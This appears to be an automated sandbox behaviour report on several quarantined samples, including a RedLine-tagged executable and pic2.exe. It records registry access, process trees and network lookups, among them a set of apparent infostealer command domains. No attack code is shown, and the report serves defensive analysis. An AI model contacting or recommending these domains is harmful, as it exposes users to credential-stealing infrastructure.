Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa207d46f8,0x7ffa207d4708,0x7ffa207d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3152 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
\??\pipe\LOCAL\crashpad_4900_PLXGAIZHPHGMWKTO
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Analysis: behavioral11
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
119s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774330" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{469EE9C1-F499-11EF-8BDE-523A95B0E536} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000041fa429953179746bab86700d9d5f5e700000000020000000000106600000001000020000000c2899edd856c3d8689e4ae57f42d3dc5662550e57b27b26b98a798c8141944eb000000000e8000000002000020000000ef19e0468a1a1b09c9b956d55be8c939e818bbb2cefe59a246d6b3b678008e4e20000000a7f2582121b18abb051e403301a423a2d9fde7bbc5a803cf1a5d52567f231a43400000003cd48e629cb730e4560360715de8584168c2a5662c046fe13067f0204f43d777bf65e4a3d5af7fb33553c5e97f86282ee5282cc36f435376d658a4aa1a7ca74f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 509f111ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2904 wrote to memory of 2892 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2904 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab82E9.tmp
C:\Users\Admin\AppData\Local\Temp\Tar837C.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Analysis: behavioral23
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
106s
Max time network
142s
Command Line
Signatures
Reads user/profile data of local email clients
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3004 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3004 -ip 3004
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 800
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | fearleszsjourney.tech | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 172.67.137.158:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.241.137:80 | www.microsoft.com | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
140s
Max time network
138s
Command Line
Signatures
RedLine
Redline family
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2288 set thread context of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 148
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
144s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffd7fdc46f8,0x7ffd7fdc4708,0x7ffd7fdc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
